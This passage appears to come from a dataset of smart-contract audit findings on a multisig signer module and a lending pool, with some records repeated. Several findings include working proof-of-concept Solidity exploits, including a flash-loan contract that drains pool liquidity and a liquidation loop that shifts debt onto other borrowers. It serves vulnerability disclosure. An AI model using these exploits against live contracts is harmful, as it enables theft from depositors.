However, the wrong value is used in the call to the safe's function, which in some circumstances can lead to the safe being permanently bricked.\\nIn `reconcileSignerCount()`, the valid signer count is calculated. We then create a value called `newThreshold`, and set it to the minimum of the valid signer count and the target threshold. This is intended to be the value that we update the safe's threshold with.\\n```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n\\nHowever, there is a typo in the contract call, which accidentally uses `validSignerCount` instead of `newThreshold`.\\nThe result is that, if there are more valid signers than the `targetThreshold` that was set, the threshold will be set higher than intended, and the threshold check in `checkAfterExecution()` will fail for being above the max, causing all safe transactions to revert.\\nThis is a major problem because it cannot necessarily be fixed. In the event that it is a gate with a single hat signer, and the eligibility module for the hat doesn't have a way to turn off eligibility, there will be no way to reduce the number of signers. 
If this number is greater than `maxSigners`, there is no way to increase `targetThreshold` sufficiently to stop the reverting.\\nThe result is that the safe is permanently bricked, and will not be able to perform any transactions.чIssue Safe can be bricked because threshold is updated with validSignerCount instead of newThreshold\\nChange the value in the function call from `validSignerCount` to `newThreshold`.\\n```\\nif (newThreshold > 0) {\\n// Remove the line below\\n bytes memory data = abi.encodeWithSignature(\"changeThreshold(uint256)\", validSignerCount);\\n// Add the line below\\n bytes memory data = abi.encodeWithSignature(\"changeThreshold(uint256)\", newThreshold);\\n\\n bool success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecChangeThreshold();\\n }\\n}\\n```\\nчAll transactions will revert until `validSignerCount` can be reduced back below `targetThreshold`, which reч```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n -Changing hat toggle address can lead to unexpected changes in statusчmediumчChanging the toggle address should not change the current status unless intended to. 
However, in the event that a contract's toggle status hasn't been synced to local state, this change can accidentally toggle the hat back on when it isn't intended.\\nWhen an admin for a hat calls `changeHatToggle()`, the `toggle` address is updated to a new address they entered:\\n```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n\\nToggle addresses can be either EOAs (who must call `setHatStatus()` to change the local config) or contracts (who must implement the `getHatStatus()` function and return the value).\\nThe challenge comes if a hat has a toggle address that is a contract. The contract changes its toggle value to `false` but is never checked (which would push the update to the local state). The admin thus expects that the hat is turned off.\\nThen, the toggle is changed to an EOA. One would expect that, until a change is made, the hat would remain in the same state, but in this case, the hat defaults back to its local storage state, which has not yet been updated and is therefore set to `true`.\\nEven in the event that the admin knows this and tries to immediately toggle the status back to `false`, it is possible for a malicious user to sandwich their transaction between the change to the EOA and the transaction to toggle the hat off, making use of a hat that should be off. 
This could have dramatic consequences when hats are used for purposes such as multisig signing.чThe `changeHatToggle()` function needs to call `checkHatToggle()` before changing over to the new toggle address, to ensure that the latest status is synced up.чHats may unexpectedly be toggled from `off` to `on` during toggle address transfer, reactivating hats that are intended to be turned `off`.ч```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n -Changing hat toggle address can lead to unexpected changes in statusчmediumчChanging the toggle address should not change the current status unless intended to. However, in the event that a contract's toggle status hasn't been synced to local state, this change can accidentally toggle the hat back on when it isn't intended.\\nWhen an admin for a hat calls `changeHatToggle()`, the `toggle` address is updated to a new address they entered:\\n```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n\\nToggle addresses can be either EOAs (who must call `setHatStatus()` to change the local config) or contracts (who must implement the `getHatStatus()` function and return the value).\\nThe challenge comes if a hat has a toggle address that is a contract. The contract changes its toggle value to `false` but is never checked (which would push the update to the local state). 
The admin thus expects that the hat is turned off.\\nThen, the toggle is changed to an EOA. One would expect that, until a change is made, the hat would remain in the same state, but in this case, the hat defaults back to its local storage state, which has not yet been updated and is therefore set to `true`.\\nEven in the event that the admin knows this and tries to immediately toggle the status back to `false`, it is possible for a malicious user to sandwich their transaction between the change to the EOA and the transaction to toggle the hat off, making use of a hat that should be off. This could have dramatic consequences when hats are used for purposes such as multisig signing.чThe `changeHatToggle()` function needs to call `checkHatToggle()` before changing over to the new toggle address, to ensure that the latest status is synced up.чHats may unexpectedly be toggled from `off` to `on` during toggle address transfer, reactivating hats that are intended to be turned `off`.ч```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n -Precision differences when calculating userCollateralRatioMantissa causes major issues for some token pairsчhighчWhen calculating userCollateralRatioMantissa in borrow and liquidate. It divides the raw debt value (in loan token precision) by the raw collateral balance (in collateral precision). This skew is fine for a majority of tokens but will cause issues with specific token pairs, including being unable to liquidate a subset of positions no matter what.\\nWhen calculating userCollateralRatioMantissa, both debt value and collateral values are left in the native precision. 
As a result of this certain token pairs will be completely broken because of this. Other pairs will only be partially broken and can enter state in which it's impossible to liquidate positions.\\nImagine a token pair like USDC and SHIB. USDC has a token precision of 6 and SHIB has 18. If the user has a collateral balance of 100,001 SHIB (100,001e18) and a loan borrow of 1 USDC (1e6) then their userCollateralRatioMantissa will actually calculate as zero:\\n```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n\\nThere are two issues with this. First is that a majority of these tokens simply won't work. The other issue is that because userCollateralRatioMantissa returns 0 there are states in which some debt is impossible to liquidate breaking a key invariant of the protocol.\\nAny token with very high or very low precision will suffer from this.чuserCollateralRatioMantissa should be calculated using debt and collateral values normalized to 18 decimal pointsчSome token pairs will always be/will become brokenч```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n -Fee share calculation is incorrectчmediumчFees are given to the feeRecipient by minting them shares. The current share calculation is incorrect and always mints too many shares the fee recipient, giving them more fees than they should get.\\nThe current equation is incorrect and will give too many shares, which is demonstrated in the example below.\\nExample:\\n```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n\\nCalculate the fee with the current equation:\\n```\\n_accuredFeeShares = fee * _totalSupply / supplied = 2 * 100 / 100 = 2\\n```\\n\\nThis yields 2 shares. Next calculate the value of the new shares:\\n```\\n2 * 110 / 102 = 2.156\\n```\\n\\nThe value of these shares yields a larger than expected fee. 
Using a revised equation gives the correct amount of fees:\\n```\\n_accruedFeeShares = (_totalSupply * fee) / (_supplied + _interest - fee) = 2 * 100 / (100 + 10 - 2) = 1.852\\n\\n1.852 * 110 / 101.852 = 2\\n```\\n\\nThis new equation yields the proper fee of 2.чIssue Fee share calculation is incorrect\\nUse the modified equation shown above:\\n```\\n uint fee = _interest * _feeMantissa / 1e18;\\n // 13. Calculate the accrued fee shares\\n- _accruedFeeShares = fee * _totalSupply / _supplied; // if supplied is 0, we will have returned at step 7\\n+ _accruedFeeShares = (_totalSupply * fee) / (_supplied + _interest - fee); // if supplied is 0, we will have returned at step 7\\n // 14. Update the total supply\\n _currentTotalSupply += _accruedFeeShares;\\n```\\nчFee recipient is given more fees than intended, which results in less interest for LPsч```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n -Users can borrow all loan tokensчmediumчUtilization rate check can be bypassed depositing additional loan tokens and withdrawing them in the same transaction.\\nIn the `borrow` function it is checked that the new utilization ratio will not be higher than the surge threshold. This threshold prevents borrowers from draining all available liquidity from the pool and also trigger the surge state, which lowers the collateral ratio.\\nA user can bypass this and borrow all available loan tokens following these steps:\\nDepositing the required amount of loan tokens in order to increase the balance of the pool.\\nBorrow the remaining loan tokens from the pool.\\nWithdraw the loan tokens deposited in the first step.\\nThis can be done in one transaction and the result will be a utilization rate of 100%.
Even if the liquidity of the pool is high, the required loan tokens to perform the strategy can be borrowed using a flash loan.\\nHelper contract:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from \"./FlashLoan.sol\";\\nimport { Pool } from \"./../../src/Pool.sol\";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n\\nExecution:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"../src/Pool.sol\";\\nimport \"../src/Factory.sol\";\\nimport \"./mocks/Borrower.sol\";\\nimport \"./mocks/ERC20.sol\";\\n\\ncontract PoC is Test {\\n address alice = vm.addr(0x1);\\n address bob = vm.addr(0x2);\\n Factory 
factory;\\n Pool pool;\\n Borrower borrower;\\n Flashloan flashLoan;\\n MockERC20 collateralToken;\\n MockERC20 loanToken;\\n uint maxCollateralRatioMantissa;\\n uint surgeMantissa;\\n uint collateralRatioFallDuration;\\n uint collateralRatioRecoveryDuration;\\n uint minRateMantissa;\\n uint surgeRateMantissa;\\n uint maxRateMantissa;\\n\\n function setUp() public {\\n factory = new Factory(address(this), \"G\");\\n flashLoan = new Flashloan();\\n collateralToken = new MockERC20(1 ether, 18);\\n collateralToken.transfer(bob, 1 ether);\\n loanToken = new MockERC20(100 ether, 18);\\n loanToken.transfer(alice, 1 ether);\\n loanToken.transfer(address(flashLoan), 99 ether);\\n maxCollateralRatioMantissa = 1e18;\\n surgeMantissa = 0.8e18; // 80%\\n pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), maxCollateralRatioMantissa, surgeMantissa, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n }\\n\\n function testFailBorrowAll() external {\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n pool.addCollateral(bob, 1 ether);\\n pool.borrow(1 ether);\\n vm.stopPrank();\\n }\\n\\n function testBypassUtilizationRate() external {\\n uint balanceBefore = loanToken.balanceOf(bob);\\n\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n borrower = new Borrower(flashLoan, pool);\\n pool.addCollateral(address(borrower), 1 ether);\\n borrower.borrowAll();\\n vm.stopPrank();\\n\\n assertEq(loanToken.balanceOf(bob) - balanceBefore, 1 ether);\\n }\\n}\\n```\\nчA possible solution would be adding a 
locking period for deposits of loan tokens.\\nAnother possibility is to enforce that the utilization rate was under the surge rate also in the previous snapshot.чThe vulnerability allows to drain all the liquidity from the pool, which entails two problems:\\nThe collateral ratio starts decreasing and only stops if the utilization ratio goes back to the surge threshold.\\nThe suppliers will not be able to withdraw their tokens.\\nThe vulnerability can be executed by the same or other actors every time a loan is repaid or a new deposit is done, tracking the mempool and borrowing any new amount of loan tokens available in the pool, until the collateral ratio reaches a value of zero.\\nA clear case with economic incentives to perform this attack would be that the collateral token drops its price at a high rate and borrow all the available loan tokens from the pool, leaving all suppliers without the chance of withdrawing their share.ч```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from \"./FlashLoan.sol\";\\nimport { Pool } from \"./../../src/Pool.sol\";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n 
(uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n -fund loss because calculated Interest would be 0 in getCurrentState() due to division errorчmediumчfunction `getCurrentState()` Gets the current state of pool variables based on the current time and other functions use it to update the contract state. it calculates interest accrued for debt from the last timestamp but because of the division error in some cases the calculated interest would be 0 and it would cause borrowers to pay no interest.\\nThis is part of `getCurrentState()` code that calculates interest:\\n```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. 
Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n\\ncode should support all the ERC20 tokens and those tokens may have different decimals. also different pools may have different values for MIN_RATE, SURGE_RATE, MAX_RATE. imagine this scenario:\\ndebt token is USDC and has 6 digit decimals.\\nMIN_RATE is 5% (2 * 1e16) and MAX_RATE is 10% (1e17) and in current state borrow rate is 5% (5 * 1e16)\\ntimeDelta is 2 second. (two seconds passed from last accrue interest time)\\ntotalDebt is 100M USDC (100 * 1e16).\\neach year has about 31M seconds (31 * 1e6).\\nnow code would calculate interest as: `_totalDebt * _borrowRate * _timeDelta / (365 days * 1e18) = 100 * 1e6 * 5 * 1e16 * 2 / (31 * 1e16 * 1e18) = 5 * 2 / 31 = 0`.\\nso code would calculate 0 interest in each interactions and borrowers would pay 0 interest. the debt decimal and interest rate may be different for pools and code should support all of them.чdon't update contract state(lastAccrueInterestTime) when calculated interest is 0. add more decimal to total debt and save it with extra 1e18 decimals and transferring or receiving debt token convert the token amount to more decimal format or from it.чborrowers won't pay any interest and lenders would lose funds.ч```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. 
Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n -A liquidator can gain not only collateral, but also can reduce his own debt!чmediumчA liquidator can gain not only collateral, but also can reduce his own debt. This is achieved by taking advantage of the following vulnerability of the liquidate(): it has a rounding down precision error and when one calls liquidate(Bob, 1), it is possible that the total debt is reduced by 1, but the debt share is 0, and thus Bob's debt shares will not be reduced. 
In this way, the liquidator can shift part of debt to the remaining borrowers while getting the collateral of the liquidation.\\nIn summary, the liquidator will be able to liquidate a debtor, grab proportionately the collateral, and in addition, reduce his own debt by shifting some of his debt to the other borrowers.\\nBelow, I explain the vulnerability and then show the code POC to demonstrate how a liquidator can gain collateral as well as reduce his own debt!\\nThe `liquidate()` function calls `tokenToShares()` at L587 to calculate the number of debt shares for the input `amount`. Note it uses a rounding-down.\\nDue to rounding down, it is possible that while `amount !=0`, the returned number of debt shares could be zero!\\nIn the following code POC, we show that Bob (the test account) and Alice (address(1)) both borrow 1000 loan tokens, and after one year, each of them owes 1200 loan tokens. Bob liquidates Alice's debt with 200 loan tokens. Bob gets the 200 collateral tokens (proportionately). 
In addition, Bob reduces his own debt from 1200 to 1100!\\nTo run this test, one needs to change `pool.getDebtOf()` as a public function.\\n```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = 
pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\nчWe need to double check this edge case and not allow the liquidate() to proceed when the # of debt shares is Zero.\\n```\\n function liquidate(address borrower, uint amount) external {\\n uint _loanTokenBalance = LOAN_TOKEN.balanceOf(address(this));\\n (address _feeRecipient, uint _feeMantissa) = FACTORY.getFee();\\n ( \\n uint _currentTotalSupply,\\n uint _accruedFeeShares,\\n uint _currentCollateralRatioMantissa,\\n uint _currentTotalDebt\\n ) = getCurrentState(\\n _loanTokenBalance,\\n _feeMantissa,\\n lastCollateralRatioMantissa,\\n totalSupply,\\n lastAccrueInterestTime,\\n lastTotalDebt\\n );\\n\\n uint collateralBalance = collateralBalanceOf[borrower];\\n uint _debtSharesSupply = debtSharesSupply;\\n uint userDebt = getDebtOf(debtSharesBalanceOf[borrower], _debtSharesSupply, _currentTotalDebt);\\n uint userCollateralRatioMantissa = userDebt * 1e18 / collateralBalance;\\n require(userCollateralRatioMantissa > _currentCollateralRatioMantissa, \"Pool: borrower not liquidatable\");\\n\\n address _borrower = borrower; // avoid stack too deep\\n uint _amount = amount; // avoid stack too deep\\n uint _shares;\\n uint collateralReward;\\n if(_amount == type(uint).max || _amount == userDebt) {\\n collateralReward = collateralBalance;\\n _shares = debtSharesBalanceOf[_borrower];\\n _amount = userDebt;\\n } else {\\n uint 
userInvertedCollateralRatioMantissa = collateralBalance * 1e18 / userDebt;\\n collateralReward = _amount * userInvertedCollateralRatioMantissa / 1e18; // rounds down\\n _shares = tokenToShares(_amount, _currentTotalDebt, _debtSharesSupply, false);\\n }\\n \\n// Add the line below\\n if(_shares == 0) revert ZeroShareLiquidateNotAllowed();\\n\\n _currentTotalDebt -= _amount;\\n\\n // commit current state\\n debtSharesBalanceOf[_borrower] -= _shares;\\n debtSharesSupply = _debtSharesSupply - _shares;\\n collateralBalanceOf[_borrower] = collateralBalance - collateralReward;\\n totalSupply = _currentTotalSupply;\\n lastTotalDebt = _currentTotalDebt;\\n lastAccrueInterestTime = block.timestamp;\\n lastCollateralRatioMantissa = _currentCollateralRatioMantissa;\\n emit Liquidate(_borrower, _amount, collateralReward);\\n if(_accruedFeeShares > 0) {\\n address __feeRecipient = _feeRecipient; // avoid stack too deep\\n balanceOf[__feeRecipient] // Add the line below\\n= _accruedFeeShares;\\n emit Transfer(address(0), __feeRecipient, _accruedFeeShares);\\n }\\n\\n // interactions\\n safeTransferFrom(LOAN_TOKEN, msg.sender, address(this), _amount);\\n safeTransfer(COLLATERAL_TOKEN, msg.sender, collateralReward);\\n }\\n```\\nчA liquidator can gain not only collateral, but also can reduce his own debt. 
Thus, he effectively steals funding from the pool by off-shifting his debt to the remaining borrowers.ч```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = pool.debtSharesBalanceOf(address(1));\\n 
assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n -Precision differences when calculating userCollateralRatioMantissa causes major issues for some token pairsчhighчWhen calculating userCollateralRatioMantissa in borrow and liquidate. It divides the raw debt value (in loan token precision) by the raw collateral balance (in collateral precision). This skew is fine for a majority of tokens but will cause issues with specific token pairs, including being unable to liquidate a subset of positions no matter what.\\nWhen calculating userCollateralRatioMantissa, both debt value and collateral values are left in the native precision. As a result of this certain token pairs will be completely broken because of this. Other pairs will only be partially broken and can enter state in which it's impossible to liquidate positions.\\nImagine a token pair like USDC and SHIB. USDC has a token precision of 6 and SHIB has 18. If the user has a collateral balance of 100,001 SHIB (100,001e18) and a loan borrow of 1 USDC (1e6) then their userCollateralRatioMantissa will actually calculate as zero:\\n```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n\\nThere are two issues with this. First is that a majority of these tokens simply won't work. 
The other issue is that because userCollateralRatioMantissa returns 0 there are states in which some debt is impossible to liquidate breaking a key invariant of the protocol.\\nAny token with very high or very low precision will suffer from this.чuserCollateralRatioMantissa should be calculated using debt and collateral values normalized to 18 decimal pointsчSome token pairs will always be/will become brokenч```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n -A liquidator can gain not only collateral, but also can reduce his own debt!чmediumчA liquidator can gain not only collateral, but also can reduce his own debt. This is achieved by taking advantage of the following vulnerability of the liquidate(): it has a rounding down precision error and when one calls liquidate(Bob, 1), it is possible that the total debt is reduced by 1, but the debt share is 0, and thus Bob's debt shares will not be reduced. In this way, the liquidator can shift part of debt to the remaining borrowers while getting the collateral of the liquidation.\\nIn summary, the liquidator will be able to liquidate a debtor, grab proportionately the collateral, and in addition, reduce his own debt by shifting some of his debt to the other borrowers.\\nBelow, I explain the vulnerability and then show the code POC to demonstate how a liquidator can gain collateral as well as reduce his own debt!\\nThe `liquidate()` function calls `tokenToShares()` at L587 to calculate the number of debt shares for the input `amount`. Note it 